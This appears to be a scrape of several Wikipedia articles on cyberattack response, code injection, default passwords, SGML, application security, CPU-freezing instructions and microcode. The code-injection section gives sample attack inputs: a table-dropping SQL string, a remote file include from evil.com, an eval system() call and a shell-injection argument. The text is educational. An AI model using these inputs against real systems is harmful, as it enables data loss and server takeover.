the average time to discovery is 197 days.[87]Some systems can detect and flag anomalies that may indicate an attack, using such technology asantivirus,firewall, or anintrusion detection system. Once suspicious activity is suspected, investigators look forindicators of attackandindicators of compromise.[88]Discovery is quicker and more likely if the attack targets information availability (for example with adenial-of-service attack) rather than integrity (modifying data) or confidentiality (copying data without changing it).[89]State actors are more likely to keep the attack secret. Sophisticated attacks using valuable exploits are more less likely to be detected or announced – as the perpetrator wants to protect the usefulness of the exploit.[89] Evidence collection is done immediately, prioritizingvolatileevidence that is likely to be erased quickly.[90]Gathering data about the breach can facilitate later litigation or criminal prosecution,[91]but only if the data is gathered according to legal standards and thechain of custodyis maintained.[92][90] Containing the affected system is often a high priority after an attack, and may be enacted by shutoff, isolation, use of a sandbox system to find out more about the adversary[90]patchingthe vulnerability, andrebuilding.[93]Once the exact way that the system was compromised is identified, there is typically only one or two technical vulnerabilities that need to be addressed in order to contain the breach and prevent it from reoccurring.[94]Apenetration testcan then verify that the fix is working as expected.[95]Ifmalwareis involved, the organization must investigate and close all infiltration and exfiltration vectors, as well as locate and remove all malware from its systems.[96]Containment can compromise investigation, and some tactics (such as shutting down servers) can violate the company's contractual obligations.[97]After the breach is fully contained, the company can then work on restoring all systems to operational.[98]Maintaining abackupand having tested incident response procedures are used to improve recovery.[25] Attributing a cyberattack is difficult, and of limited interest to companies that are targeted by cyberattacks. In contrast,secret servicesoften have a compelling interest in finding out whether a state is behind the attack.[99]Unlike attacks carried out in person, determining the entity behind a cyberattack is difficult.[100]A further challenge in attribution of cyberattacks is the possibility of afalse flag attack, where the actual perpetrator makes it appear that someone else caused the attack.[99]Every stage of the attack may leaveartifacts, such as entries in log files, that can be used to help determine the attacker's goals and identity.[101]In the aftermath of an attack, investigators often begin by saving as many artifacts as they can find,[102]and then try to determine the attacker.[103]Law enforcement agencies may investigate cyber incidents[104]although the hackers responsible are rarely caught.[105] Most states agree that cyberattacks are regulated under the laws governing theuse of force in international law,[106]and therefore cyberattacks as a form of warfare are likely to violate the prohibition of aggression.[107]Therefore, they could be prosecuted as acrime of aggression.[108]There is also agreement that cyberattacks are governed byinternational humanitarian law,[106]and if they target civilian infrastructure, they could be prosecuted as awar crime,crime against humanity, or act ofgenocide.[108]International courts cannot enforce these laws without sound attribution of the attack, without which countermeasures by a state are not legal either.[109] In many countries, cyberattacks are prosecutable under various laws aimed atcybercrime.[110]Attribution of the attackbeyond reasonable doubtto the accused is also a major challenge in criminal proceedings.[111]In 2021,United Nations member statesbegan negotiating adraft cybercrime treaty.[112] Many jurisdictions havedata breach notification lawsthat require organizations to notify people whose personal data has been compromised in a cyberattack.[113]
https://en.wikipedia.org/wiki/Attack_(computing)
Code injectionis acomputer security exploitwhere aprogramfails to correctly process external data, such as user input, causing it to interpret the data as executable commands. Anattackerusing this method "injects"codeinto the program while it is running. Successful exploitation of a code injection vulnerability can result indata breaches, access to restricted or criticalcomputer systems, and the spread ofmalware. Code injectionvulnerabilitiesoccur when an application sends untrusted data to aninterpreter, which then executes the injected text as code. Injection flaws are often found in services like Structured Query Language (SQL) databases, Extensible Markup Language (XML) parsers,operating systemcommands, Simple Mail Transfer Protocol (SMTP) headers, and other programarguments. Injection flaws can be identified throughsource codeexamination,[1]Static analysis, or dynamic testing methods such asfuzzing.[2] There are numerous types of code injection vulnerabilities, but most are errors in interpretation—they treat benign user input as code or fail to distinguish input from system commands. Many examples of interpretation errors can exist outside of computer science, such as the comedy routine"Who's on First?". Code injection can be used maliciously for many purposes, including: Code injections that target theInternet of Thingscould also lead to severe consequences such asdata breachesand service disruption.[3] Code injections can occur on any type of program running with aninterpreter. Doing this is trivial to most, and one of the primary reasons why server software is kept away from users. An example of how you can see code injection first-hand is to use yourbrowser's developer tools. Code injection vulnerabilities are recorded by the National Institute of Standards and Technology(NIST) in the National Vulnerability Database (NVD) asCWE-94. Code injection peaked in 2008 at 5.66% as a percentage of all recorded vulnerabilities.[4] Code injection may be done with good intentions. For example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without malicious intent.[5][6]Code injection could, for example: Some users may unsuspectingly perform code injection because the input they provided to a program was not considered by those who originally developed the system. For example: Another benign use of code injection is the discovery of injection flaws to find and fix vulnerabilities. This is known as apenetration test. To prevent code injection problems, the person could use secure input and output handling strategies, such as: The solutions described above deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injections of user code on a user-operated machine, which often results in privilege elevation attacks. Some approaches that are used to detect and isolate managed and unmanaged code injections are: AnSQL injectiontakes advantage ofSQL syntaxto inject malicious commands that can read or modify a database or compromise the meaning of the original query.[13] For example, consider a web page that has twotext fieldswhich allow users to enter a username and a password. The code behind the page will generate anSQL queryto check the password against the list of user names: If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid code "('Password' OR '1'='1')in the Password field, then the resulting query will look like this: In the example above, "Password" is assumed to be blank or some innocuous string. "'1'='1'" will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run or even to load up and run external programs. Assume a query with the following format: If an adversary has the following for inputs: UserID: ';DROP TABLE User; --' Password: 'OR"=' then the query will be parsed as: The resultingUsertable will be removed from the database. This occurs because the;symbol signifies the end of one command and the start of a new one.--signifies the start of a comment. Code injection is the malicious injection or introduction of code into an application. Someweb servershave aguestbookscript, which accepts small messages from users and typically receives messages such as: However, a malicious person may know of a code injection vulnerability in the guestbook and enter a message such as: If another user views the page, then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display bad HTML code. HTML and script injection are popular subjects, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or something along such lines is placed into the output HTML without being checked for HTML code or scripting. Many of these problems are related to erroneous assumptions of what input data is possible or the effects of special data.[14] Template enginesare often used in modernweb applicationsto display dynamic data. However, trusting non-validated user data can frequently lead to critical vulnerabilities[15]such as server-side Side Template Injections. While this vulnerability is similar tocross-site scripting, template injection can be leveraged to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications, which often use user inputs and templates to render a web page. The example below shows the concept. Here the template{{visitor_name}}is replaced with data during the rendering process. An attacker can use this workflow to inject code into the rendering pipeline by providing a maliciousvisitor_name. Depending on the implementation of the web application, he could choose to inject{{7*'7'}}which the renderer could resolve toHello 7777777. Note that the actual web server has evaluated the malicious code and therefore could be vulnerable toremote code execution. Aneval()injection vulnerability occurs when an attacker can control all or part of an input string that is fed into aneval()function call.[16] The argument of "eval" will be processed asPHP, so additional commands can be appended. For example, if "arg" is set to "10;system('/bin/echo uh-oh')", additional code is run which executes a program on the server, in this case "/bin/echo". PHP allowsserializationanddeserializationof wholeobjects. If an untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks.[17]Such an attack onJoomlawas found in 2013.[18] Consider thisPHPprogram (which includes a file specified by request): The example expects a color to be provided, while attackers might provideCOLOR=http://evil.com/exploitcausing PHP to load the remote file. Format string bugs appear most commonly when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly writeprintf(buffer)instead ofprintf("%s", buffer). The first version interpretsbufferas a format string and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Consider the following shortCprogram that has a local variable chararraypasswordwhich holds a password; the program asks the user for an integer and a string, then echoes out the user-provided string. If the user input is filled with a list of format specifiers, such as%s%s%s%s%s%s%s%s, thenprintf()will start reading from thestack. Eventually, one of the%sformat specifiers will access the address ofpassword, which is on the stack, and printPassword1to the screen. Shell injection (or command injection[19][unreliable source?]) is named afterUNIXshells but applies to most systems that allow software to programmatically execute acommand line. Here is an example vulnerabletcshscript: If the above is stored in the executable file./check, the shell command./check " 1 ) evil"will attempt to execute the injected shell commandevilinstead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter to defend against an attack.[20] Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these aresystem(),StartProcess(), andSystem.Diagnostics.Process.Start(). Client-serversystems such asweb browserinteraction withweb serversare potentially vulnerable to shell injection. Consider the following short PHP program that can run on a web server to run an external program calledfunnytextto replace a word the user sent with some other word. Thepassthrufunction in the above program composes a shell command that is then executed by the web server. Since part of the command it composes is taken from theURLprovided by the web browser, this allows theURLto inject malicious shell commands. One can inject code into this program in several ways by exploiting the syntax of various shell features (this list is not exhaustive):[21] Some languages offer functions to properly escape or quote strings that are used to construct shell commands: However, this still puts the burden on programmers to know/learn about these functions and to remember to make use of them every time they use shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended. A safer alternative is to useAPIsthat execute external programs directly rather than through a shell, thus preventing the possibility of shell injection. However, theseAPIstend to not support various convenience features of shells and/or to be more cumbersome/verbose compared to concise shell syntax.
https://en.wikipedia.org/wiki/Code_injection
Where a device needs ausernameand/orpasswordto log in, adefault passwordis usually provided to access the device during its initial setup, or after resetting tofactory defaults. Manufacturers of such equipment typically use a simple password, such asadminorpasswordon all equipment they ship, expecting users to change the password duringconfiguration. The default username and password are usually found in the instruction manual (common for all devices) or on the device itself.[citation needed] Default passwords are one of the major contributing factors to large-scale compromises ofhome routers.[1]Leaving such a password on devices available to the public is a major security risk.[2][3][4][5]There are several Proof-of-Concept (POC), as well as real world worms running across internet, which are configured to search for systems set with a default username and password. Voyager Alpha Force,Zotob, and MySpooler are a few examples of POC malware which scan theInternetfor specific devices and try to log in using the default credentials.[6] In the real world, many forms of malware, such asMirai, have used this vulnerability. Once devices have been compromised by exploiting the Default Credential vulnerability, they can themselves be used for various harmful purposes, such as carrying outDistributed Denial of Service(DDoS) attacks. In one particular incident, a hacker was able to gain access and control of a large number of networks including those ofUniversity of Maryland, Baltimore County, Imagination, Capital Market Strategies L, by leveraging the fact that they were using the default credentials for their NetGear switch.[7] Some devices (such aswireless routers) will have unique default router usernames and passwords printed on a sticker, which is more secure than a common default password. Some vendors will however derive the password from the device'sMAC addressusing a known algorithm, in which case the password can also be easily reproduced by attackers.[8]
https://en.wikipedia.org/wiki/Default_Credential_vulnerability
In theStandard Generalized Markup Language(SGML), anentityis aprimitivedata type, which associates astringwith either a unique alias (such as a user-specified name) or an SGMLreserved word(such as#DEFAULT). Entities are foundational to the organizational structure and definition of SGML documents. The SGML specification defines numerousentity types, which are distinguished by keyword qualifiers and context. An entity string value may variously consist ofplain text, SGML tags, and/or references to previously defined entities. Certain entity types may also invoke external documents. Entities arecalled by reference. Entities are classified as general or parameter: Entities are also further classified as parsed or unparsed: Aninternal entityhas a value that is either aliteralstring, or a parsed string comprising markup and entities defined in the same document (such as aDocument Type Declarationor subdocument). In contrast, anexternal entityhas adeclarationthat invokes an external document, thereby necessitating the intervention of anentity managerto resolve the external document reference. An entity declaration may have a literal value, or may have some combination of an optionalSYSTEMidentifier, which allows SGML parsers to process an entity's string referent as a resource identifier, and an optionalPUBLICidentifier, which identifies the entity independent of any particular representation. InXML, a subset ofSGML, an entity declaration may not have aPUBLICidentifier without aSYSTEMidentifier. When an external entity references a complete SGML document, it is known in the calling document as anSGML document entity. An SGML document is a text document with SGML markup defined in an SGML prologue (i.e., the DTD and subdocuments). A complete SGML document comprises not only the document instance itself, but also the prologue and, optionally, the SGML declaration (which defines the document's markup syntax and declares thecharacter encoding).[1] An entity is defined via anentity declarationin a document'sdocument type definition(DTD). For example: This DTD markup declares the following: Names for entities must follow the rules forSGML names, and there are limitations on where entities can be referenced. Parameter entities are referenced by placing the entity name between%and;. Parsed general entities are referenced by placing the entity name between "&" and ";". Unparsed entities are referenced by placing the entity name in the value of an attribute declared as type ENTITY. The general entities from the example above might be referenced in a document as follows: When parsed, this document would be reported to the downstream application the same as if it has been written as follows, assuming thehello.txtfile contains the textSalutations: A reference to an undeclared entity is an error unless a default entity has been defined. For example: Additional markup constructs and processor options may affect whether and how entities are processed. For example, a processor may optionally ignore external entities. Standard entity sets for SGML and some of its derivatives have been developed asmnemonicdevices, to ease document authoring when there is a need to use characters that are not easily typed or that are not widely supported by legacy character encodings. Each such entity consists of just one character from theUniversal Character Set. Although any character can be referenced using anumeric character reference, acharacter entity referenceallows characters to be referenced by name instead ofcode point. For example,HTML 4has 252 built-in character entities that do not need to be explicitly declared, whileXMLhas five.XHTMLhas the same five as XML, but if its DTDs are explicitly used, then it has 253 (&apos;being the extra entity beyond those in HTML 4).
https://en.wikipedia.org/wiki/SGML_entity
Application security(shortAppSec) includes all tasks that introduce a securesoftware development life cycleto development teams. Its final goal is to improve security practices and, through that, to find, fix and preferably prevent security issues within applications. It encompasses the whole application life cycle from requirements analysis, design, implementation, verification as well as maintenance.[1] Web application securityis a branch ofinformation securitythat deals specifically with the security ofwebsites,web applications, andweb services. At a high level, web application security draws on the principles of application security but applies them specifically to theinternetandwebsystems.[2][3]The application security also concentrates onmobile appsand their security which includes iOS and Android Applications Web Application Security Tools are specialized tools for working with HTTP traffic, e.g.,Web application firewalls. Different approaches will find different subsets of the securityvulnerabilitieslurking in an application and are most effective at different times in the software lifecycle. They each represent different tradeoffs of time, effort, cost and vulnerabilities found. The Open Worldwide Application Security Project (OWASP) provides free and open resources. It is led by a non-profit called The OWASP Foundation. The OWASP Top 10 - 2017 results from recent research based on comprehensive data compiled from over 40 partner organizations. This data revealed approximately 2.3 million vulnerabilities across over 50,000 applications.[4]According to the OWASP Top 10 - 2021, the ten most critical web application security risks include:[5] TheOWASP Top 10 Proactive Controls 2024is a list of security techniques every software architect and developer should know and heed. The current list contains: Security testing techniques scour for vulnerabilities or security holes in applications. These vulnerabilities leave applications open toexploitation. Ideally, security testing is implemented throughout the entiresoftware development life cycle(SDLC) so that vulnerabilities may be addressed in a timely and thorough manner. There are many kinds of automated tools for identifying vulnerabilities in applications. Common tool categories used for identifying application vulnerabilities include:
https://en.wikipedia.org/wiki/Web_application_security
In computer engineering,Halt and Catch Fire, known by theassembly language mnemonicHCF, is anidiomreferring to a computermachine codeinstructionthat causes the computer'scentral processing unit(CPU) to cease meaningful operation, typically requiring a restart of the computer. It originally referred to a fictitious instruction inIBM System/360computers (introduced in 1964), making a joke about its numerous non-obvious instruction mnemonics. With the advent of theMC6800(introduced in 1974), a design flaw was discovered by programmers. Due to incomplete opcode decoding, twoillegal opcodes, 0x9D and 0xDD, will cause theprogram counteron the processor to increment endlessly, which locks the processor until reset. Those codes have been unofficially named HCF. During the design process of the MC6802, engineers originally planned to remove this instruction, but kept it as-is for testing purposes. As a result, HCF was officially recognized as a real instruction.[1][2]Later, HCF became a humorous catch-all term for instructions that may freeze a processor, including intentional instructions for testing purposes, and unintentional illegal instructions. Some are considered hardware defects, and if thesystem is shared, a malicious user can execute them to launch adenial-of-service attack. In the case of real instructions, the implication of this expression is that, whereas in most cases in which a CPU executes an unintended instruction (a bug in the code) the computer may still be able to recover, in the case of an HCF instruction there is, by definition, no way for the system to recover without a restart. The expressioncatch fireis a facetious exaggeration of the speed with which the CPU chip would be switching some bus circuits, purportedly causing them to overheat and burn.[3] TheZ1(1938) andZ3(1941) computers built byKonrad Zusecontained illegal sequences of instructions which damaged the hardware if executed by accident.[4] Apocryphal stories connect this term with anillegal opcodeinIBM System/360. A processor, upon encountering the instruction, would start switchingbus linesvery fast, potentially leading to overheating.[5][6] In a computer'sassembly language, mnemonics are used that are directly equivalent tomachine codeinstructions. The mnemonics are frequently three letters long, such as ADD, CMP (to compare two numbers), and JMP (jump to a different location in the program). The HCF instruction was originally a fictitious assembly language instruction, said to be under development atIBMfor use in theirSystem/360computers, along with many other amusingthree-letter acronymslike XPR (Execute Programmer) and CAI (Corrupt Accounting Information), and similar to other joke mnemonics such as "SDI" for "Self Destruct Immediately"[7]and "CRN" for "Convert to Roman Numerals".[8]A list of such mnemonics, including HCF, shows up as "Overextended Mnemonics" in the April 1980Creative Computingflip-side parody issue.[9] CPU designers sometimes incorporate one or more undocumented machine code instructions for testing purposes, such as the IBM System/360 DIAGnose instruction.[10] TheMotorola 6800microprocessorwas the first for which an undocumented assembly mnemonic HCF became widely known. The operation codes (opcodes—the portions of the machine language instructions that specify an operation to be performed) hexadecimal 9D and DD were reported and given the unofficial mnemonic HCF in a December 1977 article by Gerry Wheeler inBYTEmagazineon undocumented opcodes.[11]Wheeler noted that Motorola reported 197 valid operation codes for the M6800 processor, and so inferred that with 256 possible 8 bit combinations, there must be 59 invalid instructions. He described the HCF as a "big surprise", and said of the Catch Fire portion of the moniker, "Well, almost": When this instruction is run the only way to see what it is doing is with anoscilloscope. From the user's point of view the machine halts and defies most attempts to get it restarted. Those persons with indicator lamps on theaddress buswill see that the processor begins to read all of the memory, sequentially, very quickly. In effect, the address bus turns into a 16 bit counter. However, the processor takes no notice of what it is reading... it just reads.[11] Another author wrote in 2002: In the old days of the Motorola 6800 microprocessor, instruction code DD caused the processor to go into an endless loop, reading from each memory address in order. (Other engineers referred to this as the "Halt and Catch Fire" [HCF] instruction, but we remembered the code by calling it the "Drop Dead" instruction.) Drop Dead mode was wonderful for spotting hardware timing and address logic problems with a scope; all of the address and clock lines were nice, cycling square waves.[12] The 6800's behavior when encountering HCF was known to Motorola by 1976. When the 6800 encounters the HCF instruction, the processor never finds the end of it, endlessly incrementing its program counter until the CPU is reset.[13]Hence, theaddress buseffectively becomes acounter, allowing the operation of alladdress linesto be quickly verified. Once the processor entered this mode, it is not responsive tointerrupts, so normal operation can only be restored by a reset (hence the "Drop Dead" and "Halt and Catch Fire" monikers). These references are thus to the unresponsive behavior of the CPU in this state, and not to any form of erratic behavior.[citation needed]. Motorola kept the HCF behavior in the 6802 variant of the processor (which released in 1977) as an intentional self-test for the 6802's 128 bytes of onboard RAM. Other HCF-like instructions were found later on the Motorola 6800 when executing undocumented opcodes FD (cycling twice slower than 9D/DD) or CD/ED (cycling at a human-readable very low frequency on a limited number of high-address lines).[14] HCF is believed to be the first built-in self-test feature on a Motorola microprocessor.[2] The Intel 8086 and subsequent processors in the x86 series have anHLT(halt) instruction, opcode F4, which stops instruction execution and places the processor in a HALT state. An enabled interrupt, a debug exception, the BINIT signal, the INIT signal, or the RESET signal resumes execution, which means the processor can always be restarted.[15]Some of the early Intel DX4 chips have a problem with the HLT instruction and cannot be restarted after this instruction is used, which disables the computer and turns HLT into more of an HCF instruction. The Linux kernel has a "no-hlt" option telling Linux to run an infinite loop instead of using HLT, which allows users of these broken chips to use Linux.[16] The 80286 has the undocumented opcode 0F 04, causing the CPU to hang when executed. The only way out is a CPU reset.[citation needed][17]In some implementations, the opcode is emulated throughBIOSas ahaltingsequence.[18] Many computers in the Intel Pentium line can be locked up by executing an invalid instruction (F00F C7C8), which causes the computer to lock up. This became known as thePentium F00F bug. No compiler creates the instruction, but a malicious programmer can insert it into code to render an afflicted computer inoperable until the machine ispower-cycled. Since its discovery, workarounds have been developed to prevent it from locking the computer, and the bug has been eliminated in subsequent Intel processors.[19][20] DuringBlack Hat USA 2017, Christopher Domas showed that he found a new "Halt and Catch Fire" instruction[21][22]on anundisclosedx86 processor model using his own x86 processorfuzzercalled sandsifter.[23] TheNMOSMOS Technology 6502has 12 invalid instructions which cause theprogram counterto fail to fetch the next instruction, locking up the CPU and requiring a processor reset.[24][25]TheWDCversion of theCMOS65C02, as well as the65C816, has theSTP(stop, opcode$DB) instruction.  When executed,STPwill stop the processor's internal clock, causing all processing to cease—also, the processor will be unresponsive to all inputs exceptRESB(reset).  The only way to clear the effects of anSTPinstruction is to toggleRESB. On theZilog Z80, executing DI (disable interrupts) followed by HALT (wait for an interrupt) results in the CPU staying frozen indefinitely, waiting for an interrupt that cannot happen. However, the non-maskable interrupt signal can be used to break out of this state, making this pair not a true HCF.[26][27]The /NMI signal is on Pin 17 of the original 40 pin DIP package.[28][29]The pair will only result in a HCF condition if either the /NMI pin is connected directly to the +5V rail, making the generation of that signal impossible, or if the interrupt routine that services /NMI ends with a return, placing it back in the HALT state. The SM83 processor[a][30]core in theGame Boy's LR35902 system on chip has a similar issue, triggered by two consecutive HALTs with interrupts disabled.[b][31]The core itself contains 11 opcodes that fully lock the CPU when executed.[32] TheHitachiSC61860, mainly used inSharppocket computersin the 1980s and 1990s, has an undocumented HCF instruction with the opcode 7B.[33]
https://en.wikipedia.org/wiki/Halt_and_Catch_Fire_(computing)
Inprocessor design,microcodeserves as an intermediary layer situated between thecentral processing unit(CPU) hardware and the programmer-visibleinstruction set architectureof a computer, also known as itsmachine code.[1][page needed]It consists of a set of hardware-level instructions that implement the higher-level machine code instructions or control internalfinite-state machinesequencing in manydigital processingcomponents. While microcode is utilized inIntelandAMDgeneral-purpose CPUs in contemporary desktops and laptops, it functions only as a fallback path for scenarios that the fasterhardwired control unitis unable to manage.[2] Housed in special high-speed memory, microcode translates machine instructions,state machinedata, or other input into sequences of detailed circuit-level operations. It separates the machine instructions from the underlyingelectronics, thereby enabling greater flexibility in designing and altering instructions. Moreover, it facilitates the construction of complex multi-step instructions, while simultaneously reducing the complexity of computer circuits. The act of writing microcode is often referred to asmicroprogramming, and the microcode in a specific processor implementation is sometimes termed amicroprogram. Through extensive microprogramming,microarchitecturesof smaller scale and simplicity canemulatemore robust architectures with widerwordlengths, additionalexecution units, and so forth. This approach provides a relatively straightforward method of ensuring software compatibility between different products within a processor family. Some hardware vendors, notablyIBMandLenovo, use the termmicrocodeinterchangeably withfirmware. In this context, all code within a device is termed microcode, whether it is microcode or machine code. For instance, updates to ahard disk drive's microcode often encompass updates to both its microcode and firmware.[3] At the hardware level, processors contain a number of separate areas of circuitry, or "units", that perform different tasks. Commonly found units include thearithmetic logic unit(ALU) which performs instructions such as addition or comparing two numbers, circuits for reading and writing data to external memory, and small areas of onboard memory to store these values while they are being processed. In most designs, additional high-performance memory, theregister file, is used to store temporary values, not just those needed by the current instruction.[4] To properly perform an instruction, the various circuits have to be activated in order. For instance, it is not possible to add two numbers if they have not yet been loaded from memory. InRISCdesigns, the proper ordering of these instructions is largely up to the programmer, or at least to thecompilerof theprogramming languagethey are using. So to add two numbers, for instance, the compiler may output instructions to load one of the values into one register, the second into another, call the addition function in the ALU, and then write the result back out to memory.[4] As the sequence of instructions needed to complete this higher-level concept, "add these two numbers in memory", may require multiple instructions, this can represent a performance bottleneck if those instructions are stored inmain memory. Reading those instructions one by one is taking up time that could be used to read and write the actual data. For this reason, it is common for non-RISC designs to have many different instructions that differ largely on where they store data. For instance, theMOS 6502has eight variations of the addition instruction,ADC, which differ only in where they look to find the two operands.[5] Using the variation of the instruction, or "opcode", that most closely matches the ultimate operation can reduce the number of instructions to one, saving memory used by the program code and improving performance by leaving thedata busopen for other operations. Internally, however, these instructions are not separate operations, but sequences of the operations the units actually perform. Converting a single instruction read from memory into the sequence of internal actions is the duty of thecontrol unit, another unit within the processor.[6] The basic idea behind microcode is to replace the custom hardware logic implementing the instruction sequencing with a series of simple instructions run in a "microcode engine" in the processor. Whereas a custom logic system might have a series of diodes and gates that output a series of voltages on various control lines, the microcode engine is connected to these lines instead, and these are turned on and off as the engine reads the microcode instructions in sequence. The microcode instructions are often bit encoded to those lines, for instance, if bit 8 is true, that might mean that the ALU should be paused awaiting data. In this respect microcode is somewhat similar to the paper rolls in aplayer piano, where the holes represent which key should be pressed. The distinction between custom logic and microcode may seem small, one uses a pattern of diodes and gates to decode the instruction and produce a sequence of signals, whereas the other encodes the signals as microinstructions that are read in sequence to produce the same results. The critical difference is that in a custom logic design, changes to the individual steps require the hardware to be redesigned. Using microcode, all that changes is the code stored in the memory containing the microcode. This makes it much easier to fix problems in a microcode system. It also means that there is no effective limit to the complexity of the instructions, it is only limited by the amount of memory one is willing to use. The lowest layer in a computer's software stack is traditionally rawmachine codeinstructions for the processor. In microcoded processors, fetching and decoding those instructions, and executing them, may be done by microcode. To avoid confusion, each microprogram-related element is differentiated by themicroprefix: microinstruction, microassembler, microprogrammer, etc.[7] Complex digital processors may also employ more than one (possibly microcode-based)control unitin order to delegate sub-tasks that must be performed essentially asynchronously in parallel. For example, theVAX 9000has a hardwired IBox unit to fetch and decode instructions, which it hands to a microcoded EBox unit to be executed,[8]and theVAX 8800has both a microcoded IBox and a microcoded EBox.[9] A high-level programmer, or even anassembly languageprogrammer, does not normally see or change microcode. Unlike machine code, which often retains somebackward compatibilityamong different processors in a family, microcode only runs on the exactelectronic circuitryfor which it is designed, as it constitutes an inherent part of the particular processor design itself. Engineers normally write the microcode during the design phase of a processor, storing it in aread-only memory(ROM) orprogrammable logic array(PLA)[10]structure, or in a combination of both.[11]However, machines also exist that have some or all microcode stored instatic random-access memory(SRAM) orflash memory. This is traditionally denoted aswritablecontrol storein the context of computers, which can be either read-only orread–write memory. In the latter case, the CPU initialization process loads microcode into the control store from another storage medium, with the possibility of altering the microcode to correct bugs in the instruction set, or to implement new machine instructions. Microprograms consist of series of microinstructions, which control the CPU at a very fundamental level of hardware circuitry. For example, a single typicalhorizontalmicroinstruction might specify the following operations: To simultaneously control all processor's features in one cycle, the microinstruction is often wider than 50 bits; e.g., 128 bits on a360/85with an emulator feature. Microprograms are carefully designed and optimized for the fastest possible execution, as a slow microprogram would result in a slow machine instruction and degraded performance for related application programs that use such instructions. Microcode was originally developed as a simpler method of developing the control logic for a computer. Initially, CPUinstruction setswerehardwired. Each step needed to fetch, decode, and execute the machine instructions (including any operand address calculations, reads, and writes) was controlled directly bycombinational logicand rather minimalsequentialstate machine circuitry. While such hard-wired processors were very efficient, the need for powerful instruction sets with multi-step addressing and complex operations (see below) made them difficult to design and debug; highly encoded and varied-length instructions can contribute to this as well, especially when very irregular encodings are used. Microcode simplified the job by allowing much of the processor's behaviour and programming model to be defined via microprogram routines rather than by dedicated circuitry. Even late in the design process, microcode could easily be changed, whereas hard-wired CPU designs were very cumbersome to change. Thus, this greatly facilitated CPU design. From the 1940s to the late 1970s, a large portion of programming was done inassembly language; higher-level instructions mean greater programmer productivity, so an important advantage of microcode was the relative ease by which powerful machine instructions can be defined. The ultimate extension of this are "Directly Executable High Level Language" designs, in which each statement of a high-level language such asPL/Iis entirely and directly executed by microcode, without compilation. TheIBM Future Systems projectandData GeneralFountainhead Processor are examples of this. During the 1970s, CPU speeds grew more quickly than memory speeds and numerous techniques such asmemory block transfer,memory pre-fetchandmulti-level cacheswere used to alleviate this. High-level machine instructions, made possible by microcode, helped further, as fewer more complex machine instructions require less memory bandwidth. For example, an operation on a character string can be done as a single machine instruction, thus avoiding multiple instruction fetches. Architectures with instruction sets implemented by complex microprograms included theIBMSystem/360andDigital Equipment CorporationVAX. The approach of increasingly complex microcode-implemented instruction sets was later calledcomplex instruction set computer(CISC). An alternate approach, used in manymicroprocessors, is to use one or moreprogrammable logic array(PLA) orread-only memory(ROM) (instead of combinational logic) mainly for instruction decoding, and let a simple state machine (without much, or any, microcode) do most of the sequencing. TheMOS Technology 6502is an example of a microprocessor using a PLA for instruction decode and sequencing. The PLA is visible in photomicrographs of the chip,[12]and its operation can be seen in thetransistor-level simulation. Microprogramming is still used in modern CPU designs. In some cases, after the microcode is debugged in simulation, logic functions are substituted for the control store.[citation needed]Logic functions are often faster and less expensive than the equivalent microprogram memory. A processor's microprograms operate on a more primitive, totally different, and much more hardware-oriented architecture than the assembly instructions visible to normal programmers. In coordination with the hardware, the microcode implements the programmer-visible architecture. The underlying hardware need not have a fixed relationship to the visible architecture. This makes it easier to implement a given instruction set architecture on a wide variety of underlying hardware micro-architectures. The IBM System/360 has a 32-bit architecture with 16 general-purpose registers, but most of the System/360 implementations use hardware that implements a much simpler underlying microarchitecture; for example, theSystem/360 Model 30has 8-bit data paths to the arithmetic logic unit (ALU) and main memory and implemented the general-purpose registers in a special unit of higher-speedcore memory, and theSystem/360 Model 40has 8-bit data paths to the ALU and 16-bit data paths to main memory and also implemented the general-purpose registers in a special unit of higher-speed core memory. TheModel 50has full 32-bit data paths and implements the general-purpose registers in a special unit of higher-speed core memory.[13]The Model 65 through the Model 195 have larger data paths and implement the general-purpose registers in faster transistor circuits.[citation needed]In this way, microprogramming enabled IBM to design many System/360 models with substantially different hardware and spanning a wide range of cost and performance, while making them all architecturally compatible. This dramatically reduces the number of unique system software programs that must be written for each model. A similar approach was used by Digital Equipment Corporation (DEC) in their VAX family of computers. As a result, different VAX processors use different microarchitectures, yet the programmer-visible architecture does not change. Microprogramming also reduces the cost of field changes to correct defects (bugs) in the processor; a bug can often be fixed by replacing a portion of the microprogram rather than by changes being made tohardware logicand wiring. In 1947, the design of theMIT Whirlwindintroduced the concept of a control store as a way to simplify computer design and move beyondad hocmethods. The control store is adiode matrix: a two-dimensional lattice, where one dimension accepts "control time pulses" from the CPU's internal clock, and the other connects to control signals on gates and other circuits. A "pulse distributor" takes the pulses generated by theCPU clockand breaks them up into eight separate time pulses, each of which activates a different row of the lattice. When the row is activated, it activates the control signals connected to it.[14] In 1951,Maurice Wilkes[15]enhanced this concept by addingconditional execution, a concept akin to aconditionalin computer software. His initial implementation consisted of a pair of matrices: the first one generated signals in the manner of the Whirlwind control store, while the second matrix selected which row of signals (the microprogram instruction word, so to speak) to invoke on the next cycle. Conditionals were implemented by providing a way that a single line in the control store could choose from alternatives in the second matrix. This made the control signals conditional on the detected internal signal. Wilkes coined the termmicroprogrammingto describe this feature and distinguish it from a simple control store. Microcode remained relatively rare in computer design as the cost of the ROM needed to store the code was not significantly different from the cost of custom control logic. This changed through the early 1960s with the introduction of mass-producedcore memoryandcore rope, which was far less expensive than dedicated logic based on diode arrays or similar solutions. The first to take real advantage of this wasIBMin their 1964System/360series. This allowed the machines to have a very complex instruction set, including operations that matched high-level language constructs like formatting binary values as decimal strings, encoding the complex series of internal steps needed for this task in low cost memory.[16] But the real value in the 360 line was that one could build a series of machines that were completely different internally, yet run the same ISA. For a low-end machine, one might use an 8-bit ALU that requires multiple cycles to complete a single 32-bit addition, while a higher end machine might have a full 32-bit ALU that performs the same addition in a single cycle. These differences could be implemented in 